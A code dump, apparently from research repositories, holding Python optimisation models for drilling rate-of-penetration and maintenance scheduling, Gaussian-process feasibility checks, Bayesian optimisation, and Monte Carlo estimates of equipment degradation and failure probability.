""" Add pyomo variables to model. """
m = self.m
m.d = p.Var(within=p.NonNegativeReals) # depth of cut per revol.
m.Ntop = p.Var(within=p.NonNegativeReals,
bounds=(0, 200)) # RPM at top/drillstring
m.Npdm = p.Var(within=p.NonNegativeReals) # PDM RPM (relative)
m.deltap = p.Var(within=p.NonNegativeReals) # Differential pressure
wstar = self.rock.wstar
if piecewise:
wmin = 0
else:
wmin = wstar
m.w = p.Var(within=p.NonNegativeReals,
bounds=(wstar, 2*wstar)) # Reduced weight-on-bit
# m.W = p.Var(within=p.NonNegativeReals) # Weight-on-bit
m.t = p.Var(within=p.NonNegativeReals) # Reduced torque
m.Tcap = p.Var(within=p.NonNegativeReals,
bounds=(0, 100000)) # Torque
m.V = p.Var(within=p.NonNegativeReals,
bounds=(0.0, 1000)) # Rate of penetration
def add_obj(self):
m = self.m
# Maximize ROP V = d*(N_top + N_pdm)
V = m.d * (m.Ntop + m.Npdm)
m.Obj = p.Objective(expr=V, sense=p.maximize)
def add_cons(self, piecewise=False):
""" Add Detournay and powercurve constraints to model. """
m = self.m
bit = self.bit
rock = self.rock
# Detournay rock-bit interaction model
m.cons.add(m.t == 2*m.Tcap*1000/(bit.a**2*(1 - bit.rho**2)))
if piecewise:
x = [0, rock.wstar, 2*rock.wstar]
y = [0, rock.wstar/rock.Sstar,
rock.wstar/rock.Sstar + rock.wstar/rock.xieps]
# TODO: Pyomo BIGM_BIN is deprecated
m.dvsw = p.Piecewise(m.d, m.w, pw_pts=x,
pw_constr_type='EQ',
pw_repn='BIGM_BIN',
f_rule=y)
transition = rock.betaw/(1 - rock.mugam*rock.xi)
x = [0, transition, max(2*transition, 2*rock.wstar)]
y = [0, rock.mugam*x[1], 1/rock.xi*(x[2] - rock.betaw)]
m.tvsw = p.Piecewise(m.t, m.w, pw_pts=x,
pw_constr_type='EQ',
pw_repn='BIGM_BIN',
f_rule=y)
else:
m.cons.add(m.d == rock.wstar/rock.Sstar
+ (m.w - rock.wstar)/rock.xieps)
m.cons.add(m.t == 1/rock.xi*(m.w - rock.betaw))
# Powercurve relationships
m.cons.add(m.Npdm == self.pdm.rpm(m.deltap))
m.cons.add(m.Tcap == self.pdm.torque(m.deltap)*1355.82)
m.cons.add(m.V == m.d/1000 * (m.Ntop + m.Npdm)*60)
def solve(self, solver='Bonmin'):
"""
Solve model.
Args:
solver: gams solver to use
"""
tstart = time.perf_counter()
self.solver = p.SolverFactory('gams', solver_io='shell')
results = self.solver.solve(self.m,
logfile='drilling.log',
io_options={'solver': solver},
symbolic_solver_labels=True)
results.write()
self.time = time.perf_counter() - tstart
return results.solver.status, results.solver.termination_condition
```
#### File: drill-scheduling/scheduling/discrete.py
```python
import math
import bisect
import curves
import pyomo.environ as p
import pandas as pd
import scipy as sp
from ropo import ROPO
class Deterministic():
"""
Drill-scheduling model.
Args:
geology: Geology object
drillstring: DrillString object
cost_maint: Curve predicting cost of maintenance
xfin: final depth/length
deltax (200): segment length
xstart (0): initial depth/length
"""
def __init__(self, geo, drillstring, cost_maint,
xfin, deltax=200, xstart=0, method='det', alpha=0.5,
mip=True, penalty=False):
self.geology = geo
self.drillstring = drillstring
self.cost_maint = cost_maint # TODO: should be part of DrillString?
self.xstart = xstart
self.xfin = xfin
self.method = method
self.alpha = alpha
self.mip = mip
self.penalty = penalty
self.eps = 0.0001
self.get_segments(xstart, xfin, deltax)
self.m = p.ConcreteModel()
self.m.cons = p.ConstraintList()
self.add_vars(mip)
self.add_rop(mip)
self.add_deg()
self.add_obj()
def get_segments(self, xstart, xfin, deltax):
""" Split length into segments under consideration of geology. """
n_seg = math.ceil((xfin - xstart)/deltax)
# Split into segments of length deltax
X = [xstart + i*deltax for i in range(0, n_seg)] + [xfin]
# Split where rock types change
for x in self.geology.transitions:
if x not in X:
bisect.insort(X, x)
self.X = set(X[:-1])
self.Xlist = X[:-1]
self.N = len(self.X)
self.delta = {X[i]: X[i+1] - X[i] for i in range(self.N)}
def add_vars(self, mip):
self.m.y = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.R = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.r = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
if mip:
self.m.z = p.Var(self.X, within=p.Binary)
def add_rop(self, mip):
""" Add ROPO model for each segment. """
self.m.rop = p.Block(self.X)
self.blocks = [ROPO(self.geology(x),
self.drillstring,
self.m.rop[x], piecewise=mip) for x in self.X]
def calc_dt(self, x):
self.delta[x]/(self.m.rop[x].V + self.eps)
def add_deg(self):
""" Add degradation constraints. """
R = 0
fc = self.drillstring.pdm.failure
for x in self.Xlist:
dt = self.delta[x] / (self.m.rop[x].V + self.eps)
dp = self.m.rop[x].deltap
if isinstance(fc, curves.WarpedGP):
r = fc(dp, self.m.r[x], self.m.cons)
# Explicit definition
else:
r = fc(dp)
self.m.cons.add(self.m.r[x] == r)
R += dt*self.m.r[x]
R -= self.m.y[x]
self.m.cons.add(self.m.R[x] == R)
# z_x >= y_x
if self.mip:
self.m.cons.add(self.m.z[x] >= self.m.y[x])
def add_obj(self):
""" Add objective to model. """
# Cost of/time spent drilling
self.m.cost_drill = p.Var()
cost_drilling = sum([self.delta[x]/(self.m.rop[x].V + self.eps)
for x in self.X])
self.m.cons.add(self.m.cost_drill == cost_drilling)
# Cost of/time spent on maintenance
self.m.cost_maint = p.Var()
if self.mip:
z = self.m.z
else:
z = self.m.y
cost_maint = sum([z[x]*self.cost_maint(x + self.delta[x])
for x in self.X])
self.m.cons.add(self.m.cost_maint == cost_maint)
# Total cost/time to completion
cost = cost_drilling + cost_maint
# Add penalty
if self.penalty:
cost += sum([self.m.y[x]**2 for x in self.X])
self.m.Obj = p.Objective(expr=cost, sense=p.minimize)
def add_cons(self):
pass
def solve(self, solver='Bonmin', options={}):
""""
Solve model.
Args:
solver: gams solver to use
options: dict of solver/gams options
"""
if solver == 'Ipopt':
self.solver = p.SolverFactory('ipopt', solver_io='nl')
results = self.solver.solve(self.m,
tee=True,
logfile='drilling.log',
symbolic_solver_labels=True)
else:
self.solver = p.SolverFactory('gams', solver_io='shell')
opt = {'optcr': 0.001, 'resLim': 60}
opt.update(options)
opt_list = ['option {0}={1};'.format(key, val)
for key, val in opt.items()]
results = self.solver.solve(self.m,
tee=True,
logfile='drilling.log',
io_options={'solver': solver},
symbolic_solver_labels=True,
add_options=opt_list)
results.write()
self.time = results['Solver'][0]['User time']
self.lb = results['Problem'][0]['Lower bound']
return results.solver.status, results.solver.termination_condition
def print_schedule(self):
""" Print schedule. """
for x in self.Xlist:
print('x: {0}, ROP: {1}, R: {2},'.format(x, self.m.rop[x].V(),
self.m.R[x]()),
'dp: {0}, t: {1}, w: {2},'.format(self.m.rop[x].deltap(),
self.m.rop[x].t(),
self.m.rop[x].w()),
'z: {0}, y: {1}'.format(self.m.z[x](),
self.m.y[x]()))
def get_schedule(self):
""" Return schedule as pandas DataFrame. """
res = []
for x in self.Xlist:
res.append({'x': x, 'ROP': self.m.rop[x].V(), 'R': self.m.R[x](),
'dp': self.m.rop[x].deltap(), 't': self.m.rop[x].t(),
'w': self.m.rop[x].w(), 'z': self.m.z[x](),
'y': self.m.y[x]()})
return pd.DataFrame(res)
def calc_avg_V(self):
""" Calculate and return average ROP. """
return sum([self.m.rop[x].V() for x in self.X])/self.N
class Wolfe(Deterministic):
def __init__(self, geology, drillstring, cost_maint,
xfin, deltax=200, xstart=0, method='det', alpha=0.5,
mip=True, penalty=False):
super().__init__(geology, drillstring, cost_maint,
xfin, deltax=deltax, xstart=xstart,
method=method, alpha=alpha,
mip=mip, penalty=penalty)
def add_deg(self):
""" Add degradation constraints. """
r = 0
pad = 0
for x in self.Xlist:
dt = self.delta[x] / (self.m.rop[x].V + self.eps)
dp = self.m.rop[x].deltap
r += self.drillstring.pdm.degradation(dt, dp)
r -= self.m.y[x]
F = sp.stats.norm.ppf(self.alpha)
pad += dt*self.drillstring.pdm.failure.calc_var(dp)*dt
for xp in [xi for xi in self.Xlist if xi < x]:
dtp = self.delta[xp] / (self.m.rop[xp].V + self.eps)
dpp = self.m.rop[xp].deltap
sig = self.drillstring.pdm.failure.calc_var(dp, dpp)
pad += 2*dt*sig*dtp
self.m.cons.add(r + F*p.sqrt(pad + self.eps) <= 1)
# self.m.cons.add(r + F*p.sqrt(0.0001) <= 1)
# 0 <= R_x <= 1 for all x
self.m.cons.add(self.m.R[x] == r)
# z_x >= y_x
if self.mip:
self.m.cons.add(self.m.z[x] >= self.m.y[x])
# self.m.cons.add(sum([self.m.z[x] for x in self.X]) <= 2)
class Chance(Deterministic):
"""
Drill scheduling model with chance constraint for Gaussian uncertainty
Args:
geology: Geology object
drillstring: DrillString object
cost_maint: Curve predicting cost of maintenance
xfin: final depth/length
deltax (200): segment length
xstart (0): initial depth/length
"""
def __init__(self, geology, drillstring, cost_maint,
xfin, eps, deltax=200, xstart=0):
self.eps = eps
self.F = sp.stats.norm.ppf(1 - eps)
super().__init__(geology, drillstring, cost_maint, xfin,
deltax=deltax, xstart=xstart)
def add_deg(self):
self.m.n = p.Var(within=p.NonNegativeIntegers)
# self.m.z = p.Var(self.X, within=p.Binary)
self.m.z = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.y = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.R = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.sig = p.Var(self.X, within=p.NonNegativeReals)
r = 0
var = 0
for x in self.Xlist:
dt = self.delta[x]/(self.m.rop[x].V + self.eps)
dp = self.m.rop[x].deltap
r += self.drillstring.pdm.degradation(dt, dp)
var += self.drillstring.pdm.variance(dt, dp)
self.m.cons.add(self.m.sig[x] == p.sqrt(var))
r -= self.m.y[x]
self.m.cons.add(self.m.R[x] == r + p.sqrt(var)*self.F)
self.m.cons.add(self.m.z[x] >= self.m.y[x])
self.m.cons.add(sum([self.m.z[x] for x in self.X]) == self.m.n)
class Gamma(Deterministic):
"""
Drill-scheduling model using Chernoff bounds and Gamma uncertainty.
NOTE: Very experimental
"""
def __init__(self, geology, drillstring, cost_maint,
xfin, eps, deltax=200, xstart=0):
self.eps = eps
super().__init__(geology, drillstring, cost_maint, xfin,
deltax=deltax, xstart=xstart)
def add_deg(self):
self.m.n = p.Var(within=p.NonNegativeIntegers)
self.m.z = p.Var(self.X, within=p.Binary)
self.m.y = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.R = p.Var(self.X, within=p.NonNegativeReals, bounds=(0, 1))
self.m.s = p.Var(self.X, within=p.NonNegativeReals,
bounds=(0.001, 100000))
self.m.sig = p.Var(self.X, within=p.NonNegativeReals)
R = 0
for x in self.Xlist:
r = -self.m.s[x]
rhs = 0
lhs = 1
for x2 in [xi for xi in self.Xlist if xi <= x]:
dt = self.delta[x2]/(self.m.rop[x2].V + self.eps)
dp = self.m.rop[x2].deltap
mu = self.drillstring.pdm.degradation(dt, dp)
sig = self.drillstring.pdm.sig(dt, dp)
k = self.drillstring.pdm.k(dt, dp)
r -= p.log(1 - sig*self.m.s[x]) * k
r -= self.m.s[x] * self.m.y[x2]
self.m.cons.add(self.m.s[x]*sig <= 0.99)
lhs += self.m.y[x2]
rhs += k*sig/(1 - sig*self.m.s[x])
self.m.cons.add(r <= math.log(self.eps))
# self.m.cons.add(lhs == rhs)
R += mu - self.m.y[x]
self.m.cons.add(self.m.R[x] == R)
self.m.cons.add(self.m.z[x] >= self.m.y[x])
self.m.cons.add(sum([self.m.z[x] for x in self.X]) == self.m.n)
```
#### File: johwiebe/drill-scheduling/sep.py
```python
import utils
import rogp
import numpy as np
import scipy as sp
import pyomo.environ as p
from rogp.util.numpy import _to_np_obj_array, _pyomo_to_np
class Sep():
def __init__(self, X):
m = p.ConcreteModel()
m.cons = p.ConstraintList()
m.r = p.Var(X, within=p.NonNegativeReals, bounds=(0, 1))
self.m = m
def check_feasibility(s, bb=False):
k = 0
feas = True
if bb:
check_block = check_deg_block_bb
else:
check_block = check_deg_block
for i, x in enumerate(s.Xvar):
if not isinstance(x, (float, int)):
if not check_block(s, k, i):
feas = False
break
k = i
if feas:
return check_block(s, k, len(s.X) - 1)
def check_deg_block(s, k, i):
fc = s.drillstring.pdm.failure
fc.rogp.set_tanh(False)
# Initialize parameters
alpha = 1 - (1 - s.alpha)/(len(s.Xm) + 1)
F = sp.stats.norm.ppf(alpha)
X = s.X[k:i]
Xvar = s.Xvar
delta = {s.X[j]: Xvar[j+1] - Xvar[j] for j in range(k, i)}
dp = [[s.m.rop[x].deltap()] for x in X]
dp = _to_np_obj_array(dp)
# TODO: make eps = 0.001 a parameter
dt = [[delta[x]/(s.m.rop[x].V + 0.001)] for x in X]
dt = [[x[0]()] for x in dt]
dt = _to_np_obj_array(dt)
sep = Sep(X)
r = _pyomo_to_np(sep.m.r, ind=X)
# Calculate matrices
Sig = fc.rogp.predict_cov_latent(dp).astype('float')
inv = np.linalg.inv(Sig)
hz = fc.rogp.warp(r)
mu = fc.rogp.predict_mu_latent(dp)
diff = hz - mu
obj = np.matmul(dt.T, r)[0, 0]
sep.m.Obj = p.Objective(expr=obj, sense=p.maximize)
c = np.matmul(np.matmul(diff.T, inv), diff)[0, 0]
sep.m.cons.add(c <= F)
utils.solve(sep, solver='Baron')
if obj() - 1.0 > 10e-5:
return False
return True
def get_deg_block(s, k, i):
fc = s.drillstring.pdm.failure
fc.rogp.set_tanh(False)
# Initialize parameters
alpha = 1 - (1 - s.alpha)/(len(s.Xm) + 1)
F = sp.stats.norm.ppf(alpha)
X = s.X[k:i]
Xvar = s.Xvar
delta = {s.X[j]: Xvar[j+1] - Xvar[j] for j in range(k, i)}
dp = [[s.m.rop[x].deltap()] for x in X]
dp = _to_np_obj_array(dp)
# TODO: make eps = 0.001 a parameter
dt = [[delta[x]/(s.m.rop[x].V + 0.001)] for x in X]
dt = [[x[0]()] for x in dt]
dt = _to_np_obj_array(dt)
# Calculate matrices
cov = fc.rogp.predict_cov_latent(dp).astype('float')*F
mu = fc.rogp.predict_mu_latent(dp).astype('float')
c = dt.astype('float')
return mu, cov, c.flatten()
def check_deg_block_bb(s, k, i):
print(k, i)
mu, cov, c = get_deg_block(s, k, i)
warping = s.drillstring.pdm.failure.rogp
bb = rogp.util.sep.BoxTree(mu, cov, warping, c)
lb, ub, node, n_iter, tt = bb.solve(max_iter=1000000, eps=0.001)
if ub - 1 <= 0.001:
return True
else:
return False
def get_extrema(s, k, i):
fc = s.drillstring.pdm.failure
mu, cov, c = get_deg_block(s, k, i)
inv = np.linalg.inv(cov)
rad = np.sqrt(np.diag(cov)[:, None])
X = s.X[k:i]
sep = Sep(X)
m = sep.m
xub = fc.rogp.warp_inv(mu + rad)
xlb = fc.rogp.warp_inv(mu - rad)
r = _pyomo_to_np(m.r, ind=X)
hz = fc.rogp.warp(r)
diff = hz - mu
c = np.matmul(np.matmul(diff.T, inv), diff)[0, 0]
obj = (c - 1)**2
m.Obj = p.Objective(expr=obj, sense=p.minimize)
extrema = []
for i in range(mu.shape[0]):
m.r[X[i]].value = xlb[i]
m.r[X[i]].fixed = True
utils.solve(sep, solver='Baron')
r = _pyomo_to_np(m.r, ind=X, evaluate=True)
hz = fc.rogp.warp(r)
extrema.append(hz)
m.r[X[i]].fixed = False
return extrema
``` |
{
"source": "johwiebe/stn",
"score": 3
} |
#### File: johwiebe/stn/bo.py
```python
import yaml
import dill
import functools
import argparse
import pandas as pd
import stn.deg as deg # noqa
from stn import stnModel, stnModelRobust # noqa
from skopt import gp_minimize
from sklearn.preprocessing import MinMaxScaler
def target(y, scaler, x):
"""
Target function for Bayesian Optimization
y: config dictionary (.yaml)
scaler: scaler to normalize data
x: alpha for which to evaluate
"""
q = x[0]
TIMEp = range(0, y["Tp"], y["dTp"])
# Load stn structure
with open(y["stn"], "rb") as dill_file:
stn = dill.load(dill_file)
# Initialize model
if y["robust"]:
model = stnModelRobust(stn)
else:
model = stnModel(stn)
# Add demands
for i, t in enumerate(TIMEp):
for p in stn.products:
model.demand(p, t, y[p][i])
# Solve model
model.solve([y["Ts"], y["dTs"], y["Tp"], y["dTp"]],
solver="cplex",
objective="terminal",
periods=1,
prefix=y["prfx"],
rdir=y["rdir"],
save=True,
alpha=q,
trace=True,
solverparams=y["solverparams"],
tindexed=False)
# Evaluate overall cost
df = model.eval(periods=y["periods"], TP=y["TP"])
obj = df["Cost"]
for j in stn.units:
obj += df[j]/100*y["ccm"][j]
# Return scaled cost
return scaler.transform(float(obj))[0][0]
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("file", help=".yaml file with run parameters")
parser.add_argument("prefix", help="prefix for file names")
args = parser.parse_args()
# Load config file
with open(args.file, "r") as f:
y = yaml.load(f)
y["prfx"] = args.prefix + y["prfx"]
# Initialize Scaler
scaler = MinMaxScaler()
scaler.fit([[0], [1]])
# Single variable target function
wrap = functools.partial(target, y, scaler)
# Get initial points and scale
x_init = [[0.02], [0.17], [0.34], [0.5]]
y_init = [[wrap(x)] for x in x_init]
scaler.fit(y_init)
y_init = [yi[0] for yi in scaler.transform(y_init)]
# Maximum number of iterations
N = 34
# Bayesian Optimization
bo = gp_minimize(wrap, [(0.02, 0.5)], x0=x_init, y0=y_init,
acq_func="EI", n_calls=N, verbose=True,
n_random_starts=0, noise="gaussian", n_jobs=-1)
# Unscale and save results
bo_x = [x[0] for x in bo.x_iters]
bo_y = scaler.inverse_transform(bo.func_vals.reshape(-1, 1))
bo_y = [yi[0] for yi in bo_y]
df = pd.DataFrame([list(i) for i in zip(bo_x, bo_y)],
columns=["alpha", "cost"])
df.to_pickle(y["rdir"] + "/" + y["prfx"] + "obj.pkl")
df.to_csv(y["rdir"] + "/" + y["prfx"] + "obj.csv")
with open(y["rdir"] + "/" + y["prfx"] + "bo.pkl", "wb") as f:
dill.dump(bo, f)
```
#### File: stn/stn/deg.py
```python
import numpy as np
import pandas as pd
import time
import dill
from joblib import Parallel, delayed
import scipy.stats as sct
from math import floor
import collections
class degradationModel(object):
"""
Degradation model for an STN unit.
unit: name of unit
dist: type of distribution
"""
def __init__(self, unit, dist="normal"):
valid_dists = ["normal"]
assert dist in valid_dists, "Not a valid distribution: %s" & dist
self.dist = dist
self.unit = unit
# dictionaries indexed by k
self.mu = {}
self.sd = {}
def set_op_mode(self, k, mu, sd):
self.mu[k] = mu
self.sd[k] = sd
def get_quantile(self, alpha, k, dt=1):
if self.dist == "normal":
mu = self.mu[k]*dt
sd = self.sd[k]*np.sqrt(dt)
return sct.norm.ppf(q=alpha, loc=mu, scale=sd)
def get_mu(self, k, dt=1):
return self.mu[k]*dt
def get_sd(self, k, dt=1):
return self.sd[k]*np.sqrt(dt)
def get_dist(self, k, dt=1):
mu = self.mu[k]*dt
sd = self.sd[k]*np.sqrt(dt)
return mu, sd
def get_eps(self, alpha, k, dt=1):
mu = self.get_mu(k, dt=dt)
eps = 1 - self.get_quantile(alpha, k, dt=dt)/mu
return eps
def calc_p_fail(model, j, alpha, TPfile, Nmc=100, N=1000, dt=3,
periods=0, pb=True, dTs=None, freq=False, knn=None, *args, **kwargs):
"""
Calculate probability of unit failure
model: solved stn model
j: unit
alpha: uncertainty set size parameter
TPfile: file with logistic regression model for markov chain
Nmc: number of sequences generated from markov chain
N: Number of Monte-Carlo evaluations for each sequence
dt: time step for naive approach
periods: number of planning periods to evaluate (all if periods=0)
pb: if set to True, approach by Poetzelberger is used (Wiener process)
"""
Ncpus = 8 # number of CPUs to used for parallel execution
# make data global for parallel execution
global stn, table
stn = model.stn
# get schedules from model scheduling horizon
if "get_unit_profile" in dir(model):
df = model.get_unit_profile(j, full=False)
df["taskmode"] = df["task"] + "-" + df["mode"]
mc0 = list(df["taskmode"])
t0 = list(df["time"])[1:]
# length of final task in scheduling horizon
i = df.tail(1)["task"].iloc[0]
if i == "None":
t0.append(t0[-1] + model.sb.dT)
elif i == "M":
t0.append(t0[-1] + stn.tau[j])
else:
k = df.tail(1)["mode"].iloc[0]
t0.append(t0[-1] + stn.p[i, j, k])
Sinit = model.model.sb.R[j, model.sb.T - model.sb.dT]()
dTp = model.pb.dT
dTs = model.sb.dT
else:
assert dTs is not None
mc0 = ["None-None"]
t0 = [dTs]
Sinit = stn.Rinit[j]
dTp = model.dT
# load logistic regression model
with open(TPfile, "rb") as dill_file:
TP = dill.load(dill_file)
# get production targets for planning horizon
pdf = model.get_production_targets()
if periods > 0:
pdf = pdf[(pdf["time"] <= periods*dTp) & (pdf["time"]
> t0[-1])]
else:
pdf = pdf[(pdf["time"] > t0[-1])]
prods = stn.products
dem = []
for p in prods:
dem.append(np.array(pdf[p]))
# generate Nmc sequences from Markov chain
st = time.time()
mclist = []
mcslist = []
tlist = []
tslist = []
if not freq:
D = {"None-None": 0, "M-M": 0}
# calculate all relavent transition probabilities once
table = {}
for i in stn.I[j]:
for k in stn.O[j]:
tm = i + "-" + k
ptm = stn.p[i, j, k]
# Dtm = stn.D[i, j, k]
# eps = 1 - stn.deg[j].get_quantile(alpha, tm, ptm)/Dtm
Dtm = stn.deg[j].get_mu(tm, ptm)
eps = stn.deg[j].get_eps(alpha, tm, ptm)
D.update({tm: Dtm*(1+eps)})
if knn is None:
for tm in D.keys():
logreg = TP[j, tm]
for period, d in enumerate(dem[0]):
if type(logreg) == str:
table[tm, period] = pd.DataFrame([1], columns=[logreg])
else:
prob = logreg.predict_proba([[d[period] for d in dem]])
table[tm, period] = np.cumsum(pd.DataFrame(prob,
columns=logreg.classes_),
axis=1)
else:
table = get_knn_TP(knn[0], dem, knn[1], j)
# generate sequences in parallel
res = Parallel(n_jobs=Ncpus)(delayed(generate_seq_mc)(D,
j, "None-None",
t0[-1],
dTs, dTp,
dem,
# eps,
Sinit=Sinit)
for i in range(0, Nmc))
else:
res = gen_seqs(Nmc, dem, j, alpha, TPfile, stn, dTs, dTp)
# append generated sequences to scheduling horizon
# occ = []
for n in range(0, Nmc):
mc = mc0 + res[n][0]
# occ.append(sum(np.array(mc) == "Separation-Slow"))
t = t0 + res[n][1]
mcshort, tshort = get_short_mc(mc, t)
mclist.append(mc)
tlist.append(t)
mcslist.append(mcshort)
tslist.append(tshort)
# estimate failure probabilities in parallel
Smax = model.stn.Rmax[j]
Sinit = model.stn.Rinit0[j]
# approach by Poetzelberger
if pb:
GL, LL = get_gradient(stn, j)
inflist = Parallel(n_jobs=Ncpus)(delayed(sim_wiener_pb)(mcslist[i],
tslist[i],
GL, LL,
Nmcs=N,
Smax=Smax,
Sinit=Sinit,
*args,
**kwargs)
for i in range(0, len(mcslist)))
inflist = np.array(inflist)*100
# naive approach
else:
Darrlist = []
for n in range(0, Nmc):
Darrlist.append(get_deg_profile(mclist[n], stn, j, model.sb.dT, dt,
Sinit=Sinit))
inflist = Parallel(n_jobs=Ncpus)(delayed(sim_wiener_naive)(Darr, j,
N=N,
Rmax=Smax,
Sinit=Sinit,
*args,
**kwargs)
for Darr in Darrlist)
inflist = np.array(inflist)/N*100
print("Time taken:" + str(time.time()-st) + ", Pfail:" + str(max(inflist)))
return inflist
def generate_seq_mc(D, j, s0, t0, dTs, dTp, demand, Sinit=0):
"""Generate sequence of operating modes from Marov chain."""
np.random.seed()
mc = []
s = s0
Smax = stn.Rmax[j]
S = Sinit
Slist = []
t = t0
# time taken by s0
if s == "None-None":
t += dTs
elif s == "M-M":
t += stn.tau[j]
else:
i, k = s.split("-")
t += stn.p[i, j, k]
tlist = []
# add operating modes to while t < T
while t < (t0 // dTp + len(demand[0]))*dTp:
mc.append(s)
Slist.append(S)
tlist.append(t)
# TODO: this should not be necessary, MC should not contain maintenance
while True:
# draw random new state from transition probabilities
s_ind = np.where(np.random.uniform()
< (table[s, t // dTp - t0 // dTp]))[1][0]
s = table[s, t // dTp - t0 // dTp].columns[s_ind]
if s != "M-M":
break
S = S + D[s]
# insert maintenance if needed
if S > Smax:
s = "M-M"
S = 0
if s == "None-None":
t += dTs
elif s == "M-M":
t += stn.tau[j]
else:
i, k = s.split("-")
t += stn.p[i, j, k]
return mc, tlist
def sim_wiener_naive(Darr, j, N=1, Sinit=0, S0=0,
Rmax=0, plot=False):
"""Calculate probability of failure with naive approach."""
np.random.seed()
Ns = Darr.shape[1]
Ninf = 0
S = np.ones(N)*Sinit
for s in range(0, Ns):
if Darr[2, s] < 0.5:
dS = np.random.normal(loc=Darr[0, s], scale=Darr[1, s], size=N)
S = S + dS
else:
S = np.ones(N)*S0
Ninf += sum(S >= Rmax)
S = S[S < Rmax]
N = S.size
return Ninf
def sim_wiener_pb(mc, t, GL, LL, Nmcs=1000, Sinit=0, S0=0, Smax=0):
"""Calcualte probabillity of failure with approach by Poetzelberger."""
J = 1
# split sequence at maintenance tasks
for mcg, tg in gen_group(mc, t, "M-M"):
if len(mcg) > 0:
J *= 1 - sim_wiener_group(mcg, tg, GL, LL, Nmcs, Sinit=Sinit,
Smax=Smax)
Sinit = S0
return 1 - J
def sim_wiener_group(mc, t, GL, LL, Nmcs=1000, Sinit=0, Smax=0):
"""
Calculate probability of failure between two maintenance tasks
(approach by Poetzelberger).
"""
np.random.seed()
Dm = [GL[tm] for tm in mc]
Dsd = [LL[tm] for tm in mc]
tdiff = [t[0]]
tdiff += [t - s for s, t in zip(t, t[1:])]
c = (Smax - Sinit - np.cumsum(np.multiply(tdiff, Dm)))
c = np.insert(c, 0, Smax - Sinit)
N = len(tdiff)
Dsqrt = np.diag(np.sqrt(tdiff))
M = np.tril(np.ones((N, N), dtype=int), 0)
hl = []
for n in range(0, Nmcs):
u = np.random.normal(scale=np.sqrt(Dsd))
A = np.matmul(np.matmul(M, Dsqrt), u)
xp = c[1:] + A
xm = np.insert(xp, 0, c[0])[:-1]
ind = [xi > 0 for xi in xp]
h = 1
for i in range(0, N):
if ind[i]:
h *= (1 - np.exp(-2*xm[i]*xp[i]/(Dsd[i]*tdiff[i])))
else:
h = 0
hl.append(h)
return 1 - np.mean(hl)
def gen_group(mc, t, sep):
"""
Generator for sequences of operating modes between maintenance
tasks.
"""
mcg = []
tg = []
for i, el in enumerate(mc):
if el == sep:
yield mcg, tg
mcg = []
tg = []
mcg.append(el)
tg.append(t[i])
yield mcg, tg
def get_short_mc(mc, t):
slast = mc[0]
mcshort = [mc[0]]
tshort = []
for i, s in enumerate(mc):
if s != slast:
mcshort.append(s)
tshort.append(t[i-1])
slast = s
tshort.append(t[-1])
return mcshort, tshort
def get_gradient(stn, j):
"""Calculate mue, sd for each task/mode combination."""
GL = {}
LL = {}
for i in stn.I[j]:
for k in stn.O[j]:
taskmode = i + "-" + k
GL[taskmode] = stn.deg[j].get_mu(taskmode)
LL[taskmode] = (stn.deg[j].get_sd(taskmode))**2
# TODO: move default values for mu, sd to stn
GL["None-None"] = 0
LL["None-None"] = 0.05**2
GL["M-M"] = 0
LL["M-M"] = 0.05**2
return GL, LL
def get_deg_profile(profile, stn, j, dT, dt=1/10, N=1, Sinit=0, S0=0):
"""Get profile of D, sd, and Mt (for naive approach)."""
Darr = np.zeros((3, 0))
t = 0
for taskmode in profile:
m = 0
# TODO: move default values for mue, sd to stn
mue = 0
sd = 0.05*np.sqrt(dt)
if taskmode == "None-None":
tend = t + dT
elif taskmode == "M-M":
tend = t + stn.tau[j]
sd = 0
m = 1
else:
s = taskmode.split("-")
i = s[0]
k = s[1]
tend = t + stn.p[i, j, k]
mue, sd = stn.deg[j].get_dist(i + "-" + k, dt)
tend = int(tend)
np.array([[1, 2], [3, 4]])
Darr = np.concatenate((Darr,
np.array([
[mue for i
in range(int(t/dt),
int(tend/dt))],
[sd for i
in range(int(t/dt),
int(tend/dt))],
[m]+[0 for i
in range(int(t/dt)+1,
int(tend/dt))]])),
axis=1)
t = tend
return Darr
def check_feasibility_lambda(lam, N, delta):
lhs = 1/(N+1)*floor((N+1)/N*((N-1)/lam**2 + 1))
if lhs <= delta:
return lam
else:
return 10000000
def calc_p_fail_dem(dem, stn_file, j, alpha, TP=None, TPfile=None,
Nmc=100, N=1000, dt=3,
periods=0, pb=True, dTs=0, dTp=0, *args, **kwargs):
"""
"""
assert TP is not None or TPfile is not None
Ncpus = 8 # number of CPUs to used for parallel execution
# make data global for parallel execution
global stn, table
with open(stn_file, "rb") as dill_file:
stn = dill.load(dill_file)
if periods > 0:
dem = [d[0:periods] for d in dem]
# get schedules from model scheduling horizon
mc0 = ["None-None"]
t0 = [dTs]
Sinit = stn.Rinit[j]
# TP = TPfile
if TPfile is not None:
with open(TPfile, "rb") as f:
TP = dill.load(f)
# get production targets for planning horizon
# generate Nmc sequences from Markov chain
D = {"None-None": 0, "M-M": 0}
# calculate all relavent transition probabilities once
table = {}
for i in stn.I[j]:
for k in stn.O[j]:
tm = i + "-" + k
ptm = stn.p[i, j, k]
Dtm = stn.deg[j].get_mu(tm, ptm)
eps = stn.deg[j].get_eps(alpha, tm, ptm)
D.update({tm: Dtm*(1+eps)})
for tm in D.keys():
logreg = TP[j, tm]
for period, d in enumerate(dem[0]):
if type(logreg) == str:
table[tm, period] = pd.DataFrame([1], columns=[logreg])
else:
prob = logreg.predict_proba([[d[period] for d in dem]])
table[tm, period] = np.cumsum(pd.DataFrame(prob,
columns=logreg.classes_), axis=1)
# generate sequences in parallel
res = Parallel(n_jobs=Ncpus)(delayed(generate_seq_mc)(D,
j, "None-None",
t0[-1],
dTs, dTp,
dem,
# eps,
Sinit=Sinit)
for i in range(0, Nmc))
# append generated sequences to scheduling horizon
tms = D.keys()
hist = {tm: [0] for tm in tms}
hist_min = {tm: [float('inf')] for tm in tms}
hist_max = {tm: [0] for tm in tms}
for n in range(0, Nmc):
mc = mc0 + res[n][0]
c = collections.Counter(mc)
for k in c:
hist[k][0] += c[k]/Nmc
